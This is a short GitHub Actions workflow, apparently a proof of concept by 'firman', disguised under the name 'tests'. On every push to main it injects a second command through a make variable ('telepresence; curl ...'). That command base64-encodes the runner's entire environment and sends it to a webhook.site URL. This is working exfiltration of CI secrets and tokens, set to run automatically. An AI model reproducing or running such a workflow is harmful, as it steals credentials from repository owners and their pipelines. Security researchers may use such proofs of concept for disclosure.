name: tests
run-name: tests-poc-by-firman

on:
  push:
    branches: [main]
  workflow_dispatch: {} # Ieu sangkan bisa dijalankeun manual

jobs:
  poc-injection:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute Command Injection
        run: |
          make install.telepresence TELEPRESENCE='telepresence; curl https://webhook.site/79ba0022-eb8e-4226-9726-b3937d00a18b/$(env | base64 -w0)'
